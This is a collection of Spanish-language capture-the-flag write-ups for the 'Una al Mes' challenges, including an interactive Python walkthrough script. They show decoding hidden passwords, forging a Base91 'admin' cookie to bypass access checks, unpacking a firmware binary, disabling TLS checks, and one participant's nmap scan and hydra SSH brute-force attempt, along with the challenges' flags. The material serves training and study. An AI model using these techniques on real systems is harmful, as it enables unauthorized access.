52 | $ sudo date -s '01/23/89'; WINEPREFIX=~/.wine64 wine episodio1.exe
53 | lun ene 23 00:00:00 CET 1989
54 |
55 | Congratulation!!, Stealing Money $$$...
56 | ----------------------------
57 | Stolen: 1.000.000.000 $
58 | ----------------------------
59 | Flag: e30f35ad8d9cb6efc0778539a669fa85
60 | ...........................................
61 |
62 | 8. Obtenemos la Flag: e30f35ad8d9cb6efc0778539a669fa85
63 |
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/percu/percu-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/percu/percu-episodio1-1.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/rafamartos/rafamartos-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/rafamartos/rafamartos-episodio1-1.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/selankon/selankon-episodio1-1.txt:
--------------------------------------------------------------------------------
1 | Hola! Aquí va el writeup:
2 |
3 | 1. En la pagina vemos que en el código html te sugieren 1234/1234 como
4 | password, pero al probarlo el resultado es negativo.
5 |
6 | 2. Al analizar los documentos descargados vemos que se descarga un
7 | archivo login.js. Al analizar este archivo vemos que es la lógica de la
8 | comprobación de la password:
9 |
10 | var Password =
11 | "unescape%28String.fromCharCode%252880%252C%2520108%252C%252097%252C%2520110%2529%29:KZQWYZLOMNUWC===";
12 |
13 | 3. Claramente vemos que se compone de dos partes:
14 | a) URL encoding
15 | unescape%28String.fromCharCode%252880%252C%2520108%252C%252097%252C%2520110%2529%29
16 |
17 | b) Base 32
18 | KZQWYZLOMNUWC===
19 |
20 | En el código javascript vemos que el delimitador es ":", por tanto lo
21 | que hay antes de los ":" puede ser el primer pin y lo segundo es el
22 | segundo pin.
23 |
24 | 4. PRIMER PIN: buscamos un decodificador de URL encoding, por ejemplo
25 | este: https://www.browserling.com/tools/url-decode. Al decodificar un
26 | par de veces vemos que el resultado es el siguiente:
27 | unescape(String.fromCharCode(80, 108, 97, 110))
28 |
29 | He comprobado la documentación de la función fromCharCode(),
30 | https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/fromCharCode
31 | , vemos que devuelve una string. Así que simplemente he ejecutado esa
32 | función (o en un jsfiddle o en un documento html, es lo mismo...):
33 |
34 | console.log(String.fromCharCode(80, 108, 97, 110))
35 |
36 | Y devuelve:
37 | Plan
38 |
39 | SEGUNDO PIN:
40 | $ echo "KZQWYZLOMNUWC===" | base32 -d
41 | Valencia
42 |
43 | 5. Al poner los pins, recibimos la password del zip (captura de pantalla
44 | adjuntada)
45 |
46 | 6. Descargamos el fichero, y lo ejecutamos con wine. Vemos un mensaje de
47 | error que nos indica que la fecha es errónea:
48 | System_Date: 05/20/18
49 | Wrong date R3m0!
50 |
51 | 7. Deducimos que la fecha correcta está en el fichero, con formato
52 | mm/dd/yy .
53 | $ strings episodio1.exe | grep -E '[0-9][0-9]\/[0-9][0-9]\/[0-9][0-9]'
54 | 01/23/89
55 |
56 | 8. Cambiamos la fecha del sistema al día de 01/23/89. Será la fecha de
57 | aniversario de mr Rem0? Al ejecutar..:
58 | $ date
59 | lun ene 23 10:45:08 CET 1989
60 |
61 | $ wine episodio1.exe
62 | fixme:ntdll:find_reg_tz_info Can't find matching timezone information in
63 | the registry for bias -60, std (d/m/y): 24/09/1989, dlt (d/m/y): 26/03/1989
64 |
65 | Congratulation!!, Stealing Money $$$...
66 | ----------------------------
67 | Stolen: 1.000.000.000 $
68 | ----------------------------
69 | Flag: e30f35ad8d9cb6efc0778539a669fa85
70 | ...........................................
71 | Pulse cualquier tecla para continuar...
72 |
73 | En la plataforma hay que poner el flag en formato:
74 |
75 | UAM{e30f35ad8d9cb6efc0778539a669fa85}
76 |
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/socialkas/socialkas-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/socialkas/socialkas-episodio1-1.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/victormanuelleyva/victormanuelleyva-episodio1-1.txt:
--------------------------------------------------------------------------------
1 | codigo fuente-- javascript unescape unicode base32 solucion Plan::Valencia da como resultado PR0F3S0R&R10
2 |
3 |
4 | Bueno, en primer lugar enhorabuena por la nueva plataforma.
5 |
6 | En primer lugar he accedido a la web del reto en la que pedían dos códigos, como siempre he mirado el código y he visto que habían un script "login.js"
7 |
8 | /*
9 |
10 | function conexion(){
11 | var Password = "unescape%28String.fromCharCode%252880%252C%2520108%252C%252097%252C%2520110%2529%29:KZQWYZLOMNUWC===";
12 | for (i = 0; i < Password.length; i++)
13 | {
14 | if (Password[i].indexOf(code1) == 0)
15 | {
16 | var TheSplit = Password[i].split(":");
17 | var code1 = TheSplit[0];
18 | var code2 = TheSplit[1];
19 | }
20 | }
21 |
22 | */
23 |
24 | Primero he recurrido a la web http://www.utilities-online.info/urlencode/ para decodificar la parte de código que estaba codificada con unescape, dos veces, obteniendo como resultado:
25 |
26 | unescape(String.fromCharCode(80, 108, 97, 110)):KZQWYZLOMNUWC===
27 |
28 | Donde se "codifica tanto el código 1 como el código 2, por lo que he recurrido a cyberchef para decodificar el base32 dando como resultado Valencia y por otro lado, al ser caracteres unicode 80, 108, 97, 110, he recurrido al viejo truco súper secreto de pulsar la tecla Alt mas la cifra xD
29 |
30 | Toda vez que tenemos la pass PR0F3S0R&R10 (que con la prisa pensaba que había que reventar con fuerza bruta en primer lugar... xD) obtenemos el exe.
31 |
32 | Bien, al no tener herramientas para debuggear w64, he intentado hacerlo con radare... no me ha dado el cerebro, así que he buscado como hacerlo a las bravas y he descubierto dos cosas, una es que se pueden extraer todas las strings del exe mediante:
33 |
34 | strings episodio1.exe > strings.txt
35 |
36 | de ahí podría haber deducido ya la flag puesto que la daba en orden pero realmente no deduces como funciona el programa que, por otro lado no tenía manera de ejecutar, así que buscando he descubierto que hay una versión idafree70_linux.run que me he bajado, instalado, ejecutado et voilà, voy al salto y veo que la fecha 01/23/89 es la flag, así que md5online y a enviar.
37 |
38 | Bueno, un saludo y gracias!
39 |
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-2/bicacaro/bicacaro-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-2/bicacaro/bicacaro-episodio1-2.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-2/darkeagle/darkeagle-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-2/darkeagle/darkeagle-episodio1-2.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-2/j0n3/j0n3-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-2/j0n3/j0n3-episodio1-2.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-2/oreos/oreos-episodio1-2.txt:
--------------------------------------------------------------------------------
1 | NICK: oreos
2 |
3 | SOLUCIÓN: Episodio 1 - 2ª Parte
4 |
5 | 1. Accedemos a la URL del reto: http://34.247.69.86/lacasadepapel/episodio1/2da_parte.php
6 |
7 | $ curl http://34.247.69.86/lacasadepapel/episodio1/2da_parte.php
8 |
9 | 2. Observamos un formulario.
10 |
11 |
23 |
24 | 3. Enviamos en el campo "flag" la bandera del reto anterior.
25 |
26 | $ curl http://34.247.69.86/lacasadepapel/episodio1/2da_parte.php -X POST -F 'flag=e30f35ad8d9cb6efc0778539a669fa85' -v
27 |
28 | 4. Observamos que recibimos una cookie del servidor:
29 |
30 | < HTTP/1.1 100 Continue
31 | < HTTP/1.1 200 OK
32 | < Date: Mon, 28 May 2018 08:05:02 GMT
33 | < Server: Apache/2.4.25 (Debian)
34 | < Set-Cookie: acceso=4a7g%3F%5B%5D%40r%25y; expires=Mon, 28-May-2018 09:05:02 GMT; Max-Age=3600
35 | < Refresh: 0
36 | < Vary: Accept-Encoding
37 | < Content-Length: 1305
38 | < Content-Type: text/html; charset=UTF-8
39 |
40 | 5. Repetimos la llamada con la cookie obtenida:
41 |
42 | $ curl http://34.247.69.86/lacasadepapel/episodio1/2da_parte.php --cookie "acceso=4a7g%3F%5B%5D%40r%25y"
43 |
44 |
Acceso no autorizado a la información clasificada
45 |
46 | 6. El valor de 'acceso' parece estar codificado.
47 |
48 | - Decodificamos el valor en Base91:
49 |
50 | B91Decode(4a7g%3F%5B%5D%40r%25y) = B91Decode(4a7g?[]@r%y) = visitante
51 |
52 | - Codificamos la cadena 'admin' en Base91:
53 |
54 | B91Encode(admin) = dMLg7=A
55 |
56 | 7. Repetimos la llamada con la cookie modificada:
57 |
58 | $ curl http://34.247.69.86/lacasadepapel/episodio1/2da_parte.php --cookie "acceso=dMLg7=A"
59 |
60 |
El codigo para descomprimir el zip está claro... ApdnioimcuFqoftnpSBLLeugbu
61 |
62 | 8. El texto obtenido parece estar cifrado, probamos distintos algoritmos hasta dar con el correcto:
63 |
64 | Playfair: http://rumkin.com/tools/cipher/playfair.php
65 |
66 | PlayfairDecode(ApdnioimcuFqoftnpSBLLeugbu) = ElcodigoesAllisonUAMParker
67 |
68 | 9. Usamos la clave 'AllisonUAMParker' para descomprimir el zip.
69 |
70 | $ 7z e flag.zip
71 |
72 | 10. Obtenemos la flag
73 |
74 | $ cat flag.txt
75 |
76 | UAM{c9beec67d71c56a0f9b683fe5232e76e}
77 |
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-2/rafamartos/rafamartos-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-2/rafamartos/rafamartos-episodio1-2.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/cesarjz/cesarjz-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio2/cesarjz/cesarjz-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/darkeagle/darkeagle-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio2/darkeagle/darkeagle-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/j0n3/j0n3-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio2/j0n3/j0n3-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/percu/percu-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio2/percu/percu-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/rafamartos/rafamartos-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio2/rafamartos/rafamartos-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/victormanuelleyva/victormanuelleyva-episodio2.txt:
--------------------------------------------------------------------------------
1 | UAM EPISODIO 2
2 |
3 | Arrancamos desde la URL http://34.247.69.86/lacasadepapel/episodio2/index.html, donde nos encontramos un "chat" donde presuntamente podemos escribir lo que queramos y se nos dice que tengamos cuidado porque todo será leído por ellos.
4 | En primer lugar me miré todo el código fuente y los scripts de la web, estuve dándole un par de vueltas al script game-frame.js, con la idea de que serviría de algo. Tras ver que no valía para nada, estudio el otro y entonces caí en que el tema está en que "lee todo lo que ponemos"
5 |
6 | Comienzo escribiendo todo tipo de caracteres y al no recibir respuesta empiezo a probar hasta que me doy cuenta de que si envío texto entre llaves, no muestra nada y ahí se me encendió la luz, pero el ansia me llevó a pulsar las hints y confirmar lo que ya sabía pero no confiaba en lo que creía.
7 |
8 | Comienzo a buscar el payload, tiro de https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet hasta que detecto que me da el password "OsLoHaPerDidOaSuPrImo" para el zip, no sin antes darme de bruces varias veces hasta darme cuenta de que la I no era una L... cosas de la tipografía y mi cerebro.
9 |
10 | Una vez que descomprimimos el zip nos encontramos el archivo episodio2.wav con un sonido irrelevante, por lo que enseguida acudo a un generador de espectrograma de sonido
11 |
12 |
13 | http://convert.ing-now.com/mp3-audio-waveform-graphic-generator/download/spectrogram/7e108ff8b20b1c6cb61c9350fd1c149f/?v=1529099356219/
14 |
15 | Donde se nos muestran las coordenadas 40.441186 -3.687506, que nos llevan a La Casa de Papel, pero, tras probar n veces el hash resultante de La Casa de Papel, de Csic, incluso pensé en pasar matrículas que se ven en las fotos de google maps, se nos reveló una sutil pista, un paso atrás... así que, hash de las coordenadas y listo!
16 |
17 | Muy entretenido, gracias admins!
18 |
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/bicacaro/bicacaro-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio3/bicacaro/bicacaro-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/blueudp/blueudp-episodio3.py:
--------------------------------------------------------------------------------
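#Copiame en un archivo .py, ejecutame con python3
"""Interactive write-up for Una al Mes #5 (La Casa de Papel, episodio 3), by Blueudp.

The script narrates the solution and runs each step for the reader: download
the firmware zip, mount the ext4 image it contains, unpack and run the
``.bomb`` binary, locate the server it points to, fetch the two audio files
and finally MD5 the string recovered from the Morse code.

It shells out to external tools (wget, unzip, file, mount, upx, strings,
curl, nano) and must run as root because it mounts a filesystem image.
"""
import hashlib
import os
import shutil
import subprocess
import sys

# Where the firmware image is mounted, and where the bomb binary is copied
# before it is unpacked and executed.  The image is mounted read-only and the
# binary is handled as a copy, so the downloaded image is never modified and
# nothing is executed straight out of it.
MOUNT_POINT = "/media/DISK1"
BOMB_COPY = "./bomb"

# String the Morse message tells us to hash for the final flag.
FLAG_SOURCE = "bellaciaoremo"


def pause(prompt: str = " ") -> None:
    """Block until the reader presses Enter; whatever they type is discarded."""
    input(prompt)


def run(*argv: str) -> int:
    """Run an external command without a shell and return its exit status.

    The walkthrough is best-effort: a failing command is reported on stdout
    but does not abort the script, so the reader still sees the narration
    (the original ignored every os.system() return value).  A missing tool
    is reported the same way instead of raising.
    """
    try:
        status = subprocess.run(list(argv)).returncode
    except FileNotFoundError:
        print("[aviso] no se encontró el comando '{}'".format(argv[0]))
        return 127
    if status != 0:
        print("[aviso] '{}' terminó con código {}".format(" ".join(argv), status))
    return status


def ask_flag_source() -> str:
    """Prompt until the reader types exactly the string to be hashed.

    The original accepted any input that merely *contained* the string and
    then hashed the whole input, so a stray character produced a wrong flag
    without any complaint; here surrounding whitespace is stripped and an
    exact match is required.
    """
    while True:
        typed = input("Inserta bellaciaoremo para cifrarlo en md5: ").strip()
        if typed == FLAG_SOURCE:
            return typed
        print("Esa no es la string a cifrar!")


def main() -> None:
    """Drive the walkthrough from start to finish.

    Exits with status 1 when not running as root; the filesystem image is
    unmounted again as soon as the bomb step is done, even if it fails.
    """
    # The original tested `os.getuid() is not 0`: identity, not value, which
    # CPython only happens to satisfy for small ints.  mount needs the
    # *effective* uid, so that is what is checked.
    if os.geteuid() != 0:
        print("Necesito sudo para montar particiones y crear directorios!")
        sys.exit(1)

    print("Una al Mes #5 Write-Up")
    print("Write-up Interactivo Por Blueudp\n")
    print("Lo primero que nos encontramos en la plataforma es un texto que dice:")
    print("""Con todo el dinero robado, necesitamos escapar dando una distracción
a la policia. Para ello, hace falta encontrar la bomba programada en el \033[1;33;40mfirmware
del sistema informático. Una vez resuelta, podremos acceder al servidor\033[0m, donde
tras buscar bien, conseguiremos la flag final y escaparemos con el premio. [Pulsa Enter]: """)
    pause()
    print("Posteriormente, descargamos el '.zip' que nos ofrecen [Pulsa Enter]: ")
    pause()

    run("clear")
    print("Downloading .zip...")
    run("wget", "https://unaalmes.hispasec.com/files/92b2478b76c8ccf43f8fb2c4814faab3/firmware.zip")
    run("clear")

    print("Descargado!!! [Pulsa Enter]: ")
    pause()
    print("Lo siguiente, lógicamente, es descomprimir el zip: ")
    print("unzip firmware.zip\n")
    run("unzip", "firmware.zip")

    print("""\nUna vez descomprimido vemos un archivo '.raw', le hacemos un file
y nos damos cuenta que es una partición ext4""")
    print("\nfile backup.raw")
    run("file", "backup.raw")

    print("\nAl ser una partición ext4, procedemos a montarla [Pulsa Enter]: ")
    pause()

    mounted = False
    try:
        os.makedirs(MOUNT_POINT, exist_ok=True)
        # Read-only: the image is the challenge's evidence and nothing in
        # this walkthrough needs to write into it.
        mounted = run("mount", "-t", "ext4", "-o", "ro", "backup.raw", MOUNT_POINT) == 0
        if not mounted:
            sys.exit("No se pudo montar backup.raw en " + MOUNT_POINT)
        print("Montada!")

        pause("Presione enter para hacer un 'ls -a' y ver los archivos: ")
        print("\n")
        run("ls", "-a", MOUNT_POINT)

        print("""El archivo '.bomb' es la bomba, asi que necesitamos el código, para ello
primero la desempaquetaremos con upx 'upx -d .bomb' [Pulsa Enter]: """)
        pause()
        # Work on a private copy: upx -d rewrites the file in place, and the
        # binary is executed later, which should not happen from the image.
        shutil.copy2(os.path.join(MOUNT_POINT, ".bomb"), BOMB_COPY)
        run("upx", "-d", BOMB_COPY)
        os.chmod(BOMB_COPY, 0o700)

        print("Posteriormente, hacemos un strings para ver la pass [Pulsa Enter]: ")
        pause()
        run("strings", BOMB_COPY)

        print("Por el medio del fichero pone 'italy', prueba a insertar esa pass en la bomba. [Pulsa Enter] (Tendrás que esperar 1 min): ")
        pause()
        run(BOMB_COPY)
    finally:
        # The original never unmounted; the rest of the walkthrough does not
        # need the image, so release it here whatever happened above.
        if mounted:
            run("umount", MOUNT_POINT)

    print("""\nBien!, tienes un string algo raro, si le quitas las barra bajas
verás que es un hash md5 el cual, una vez crackeado, contiene la ip del server [Pulsa Enter]: """)
    pause()
    print("La ip es http://95.216.138.194/ (crackeado con 'https://www.md5online.es/') [Pulsa Enter]: ")
    pause()
    print("Procedemos a entrar [Pulsa Enter]: ")
    pause()
    # Expected to fail: the certificate is not issued for this IP, which is
    # exactly what the next message explains to the reader.
    run("wget", "https://95.216.138.194")
    print("\nwget dice que el certificado del propietario con coincide con el host que pusimos... Vamos a ver cual es el propietario [Pulsa Enter]: ")
    pause()
    print("Al pasar la ip por 'https://www.sslshopper.com', nos dice que el propietario es 'lacasadepapel.cloud', probaremos a asignar la ip que nos dieron con ese propietario a ver si funciona [Pulsa Enter]: ")
    pause()
    print("Para ello, añadimos esta linea a /etc/hosts: '95.216.138.194 lacasadepapel.cloud' <- copiala [Pulsa Enter para abrir /etc/hosts/]: ")
    pause()
    # The reader edits the system hosts file by hand, as the narration says
    # (curl's --resolve would map the name for a single request instead).
    run("nano", "/etc/hosts")

    print("Una vez editado, probamos a hacer una petición a 'lacasadepapel.cloud', pero con la opción de no revisar el certificado, disponible en curl (-k) y wget (--no-check-certificate) [Pulsa Enter]: ")
    pause()
    # The host presents a certificate no local CA vouches for, so TLS
    # verification is switched off for these requests only.
    run("curl", "-k", "https://lacasadepapel.cloud")
    print("\nRayos!, un index con dos audios, procedemos a descargarlos [Pulsa Enter]: ")
    pause()
    run("wget", "--no-check-certificate", "https://lacasadepapel.cloud/audio/Bella_Ciao.mp3")
    run("wget", "--no-check-certificate", "https://lacasadepapel.cloud/audio/Bella_Cia0.wav")

    print("Si te fijas, en el .wav hay un morse algo flojito, y en el mp3 está la misma canción, pero sin el morse")
    print("Hay un tipo de auriculares 'con supresión de ruido' que captan el sonido por el micrófono y lo emiten (con las ondas al revés) por los altavoces, como nosotros tenemos dos audios iguales, pero con un pequeño sonido diferente podemos aplicar la misma técnica, y así, quedará el morse limpio [Pulsa Enter]: ")
    pause()
    print("¿Como se hace eso?, abre audacity y añade los dos archivos de sonido, selecciona uno de ellos y ve a efectos > invertir, no notarás nada, pero al darle a play.. Solo se escucha el morse!, (al principio del audio no se escuhará nada), asi que solo queda decodearlo, para ello vamos a una web para ello, el resultado será: 'laflagesbellaciaoremoenmd5' , así que hasheamos 'bellaciaoremo', añadimos UAM{} y... Listo! [Pulsa Enter]: ")
    pause()

    source = ask_flag_source()
    digest = hashlib.md5(source.encode("utf-8")).hexdigest()
    print("\nEl hash es: '{}'".format(digest))
    print("\nGracias por leer este chapuzero write-up, espero que hayais aprendido con el.\nun saludo a los admins y a los compañeros de UAM!\n yo me voy a ver la casa de papel")


if __name__ == "__main__":
    main()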
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/cesarjz/cesarjz-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio3/cesarjz/cesarjz-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/darkeagle/darkeagle-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio3/darkeagle/darkeagle-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/j0n3/j0n3-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio3/j0n3/j0n3-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/victormanuelleyva/victormanuelleyva-episodio3.txt:
--------------------------------------------------------------------------------
1 | UAM _La_Casa_de_Papel_Final_Season.
2 |
3 |
4 | En primer lugar descargamos y analizamos con blink el firmware
5 |
6 | luego encontramos la carpeta con la bomba
7 | analizamos la bomba hasta darnos cuenta de que hay que desempacarla
8 |
9 |
10 | upx -d .bomb
11 |
12 | y vemos que la pass es italy
13 |
14 | nos devuelve
15 |
16 | _dbf7c981d7e_fe8_c462eab3c39_f2b06_fd
17 |
18 |
19 |
20 | quitamos los guiones bajos y al ser 32 caracteres sospecho de que es un md5, probamos en md5online et voilà
21 |
22 | http://95.216.138.194/
23 |
24 |
25 |
26 | nos pide un certificado, me pongo a autofirmar uno pero no funciona
27 |
28 | lanzo un nmap para ver puertos, veo ssh, 443, 80 y creo que ftp también, pruebo fuerza bruta con hydra al ssh tirando de rockyou... nada, tiro de todas las posibilidades que se me ocurren con curl, wget, intentando descargar algo que me de una señal.
29 |
30 | Pruebo curl con ssl
31 |
32 | root@kali:~# curl -k https://95.216.138.194/
33 |
34 |
35 | 301 Moved Permanently
36 |
37 |
39 |
40 | Apache/2.4.25 (Debian) Server at 95.216.138.194 Port 443
41 |
42 | root@kali:~#
43 |
44 | intento bajar algo con wget y me dice que no tengo permiso, que mis certificados le dan la risa, investigo por internet como pasar de eso y obtengo las cabeceras:
45 |
46 | root@kali:~# wget --no-check-certificate -S https://95.216.138.194/ -O - > /dev/null
47 | --2018-07-19 00:17:12-- https://95.216.138.194/
48 | Conectando con 95.216.138.194:443... conectado.
49 | AVISO: El certificado de “95.216.138.194” no es confiable.
50 | AVISO: El certificado de “95.216.138.194” no tiene un emisor conocido.
51 | El propietario del certificado no se ajusta al nombre de equipo “95.216.138.194”
52 | Petición HTTP enviada, esperando respuesta...
53 | HTTP/1.1 301 Moved Permanently
54 | Date: Wed, 18 Jul 2018 22:17:12 GMT
55 | Server: Apache/2.4.25 (Debian)
56 | Strict-Transport-Security: max-age=63072000; includeSubdomains
57 | X-Frame-Options: DENY
58 | X-Content-Type-Options: nosniff
59 | Location: http://95.216.138.194
60 | Content-Length: 310
61 | Keep-Alive: timeout=5, max=100
62 | Connection: Keep-Alive
63 | Content-Type: text/html; charset=iso-8859-1
64 | Localización: http://95.216.138.194 [siguiendo]
65 | --2018-07-19 00:17:12-- http://95.216.138.194/
66 | Conectando con 95.216.138.194:80... conectado.
67 | Petición HTTP enviada, esperando respuesta...
68 | HTTP/1.1 400 Bad Request
69 | Date: Wed, 18 Jul 2018 22:17:13 GMT
70 | Server: Apache/2.4.25 (Debian)
71 | Strict-Transport-Security: max-age=63072000; includeSubdomains
72 | X-Frame-Options: DENY
73 | X-Content-Type-Options: nosniff
74 | Content-Length: 437
75 | Connection: close
76 | Content-Type: text/html; charset=iso-8859-1
77 | 2018-07-19 00:17:13 ERROR 400: Bad Request.
78 |
79 | Mientras pienso y pruebo me doy cuenta que con el navegador, si voy al 443 cambia el error y pasa de indicar que el server está en home a que está en lacasadepapel.cloud, lo mismo que ponía en los certificados.
80 | 0 s:/C=ES/ST=Some-State/O=La Casa de Papel SL/OU=Films and Fun!/CN=lacasadepapel.cloud/emailAddress=info@lacasadepapel.cloud
81 |
82 |
83 |
84 | Usando Burp, con el proxy rescato las cabeceras GET
85 |
86 | GET / HTTP/1.1
87 | Host: 95.216.138.194:443
88 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
89 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
90 | Accept-Language: en-US,en;q=0.5
91 | Accept-Encoding: gzip, deflate
92 | Connection: close
93 | Upgrade-Insecure-Requests: 1
94 |
95 | Entonces copio para curl y obtengo mismos resultados, bad request, así que pruebo a enviar un POST con repeater de BURP, para ver que obtengo y sorpresa!
96 |
97 | HTTP/1.1 200 OK
98 | Date: Wed, 18 Jul 2018 22:47:35 GMT
99 | Server: Apache/2.4.25 (Debian)
100 | Strict-Transport-Security: max-age=63072000; includeSubdomains
101 | X-Frame-Options: DENY
102 | X-Content-Type-Options: nosniff
103 | Last-Modified: Wed, 11 Jul 2018 15:25:56 GMT
104 | ETag: "131-570badcf46493-gzip"
105 | Accept-Ranges: bytes
106 | Vary: Accept-Encoding
107 | Content-Length: 305
108 | Connection: close
109 | Content-Type: text/html
110 |
111 |
112 |
113 | La casa de papel
114 |
115 |
116 |
117 |
118 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 | Así que... wget recursivo para obtener los archivos (ahí cometí un error, no vi que había dos archivos de audio, mi mente solo vio uno y por eso estuve dando mil vueltas con el morse posteriormente)
131 |
132 | wget --no-check-certificate --header="Host: 95.216.138.194:443" https://95.216.138.194 (al final caí en tener que hacerlo a la url https://95.216.138.194/audio/ para poder bajar el mp3.
133 |
134 | Una vez solventado el hecho de que me faltaba el mp3 y dada la cantidad de cabezazos que me había dado con el wav, en base a las hints que dieron los admins por el canal, tiro de audacity, detecté el morse e intenté hacerlo a las bravas, evidentemente sin el mp3 era inviable, pero toda vez que lo obtuve y remendé mi error, tiré de audacity nuevamente e investigué como borrar una "parte" de una canción.
135 |
136 | Tiré del proceso manual para eliminar voces (invertir una pista) y se quedó más nítido el morse, corté la sección de la canción, generé el espectrograma, jugué con la ganancia, límites de frecuencia y db para obtener algo lo más nítido posible que cuadrara un poco con el morse que mi viejo oído de scout xDDD intuía, con eso y con cyberchef obtuve la flag:
137 |
138 | LAFLAGESBELLACIAOREMOENMD5
139 |
140 |
141 | Brutal, divertido y he aprendido un huevo sobre certificados, nmap, metasploit al intentar reventar el ssh, de audacity...
142 |
143 | Gracias pero algún día me tomaré mi venganza.
144 |
145 | Un saludo.
146 |
147 | Victor.
148 | eternaln00b
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
--------------------------------------------------------------------------------
/writeups/matrix/episodio1/bicacaro/bicacaro-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio1/bicacaro/bicacaro-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/matrix/episodio1/darkeagle/darkeagle-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio1/darkeagle/darkeagle-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/matrix/episodio1/julianjm/julianjm-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio1/julianjm/julianjm-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/matrix/episodio1/nachinho3/nachinho3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio1/nachinho3/nachinho3-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/matrix/episodio2/darkeagle/darkeagle-episodio2.pdf:
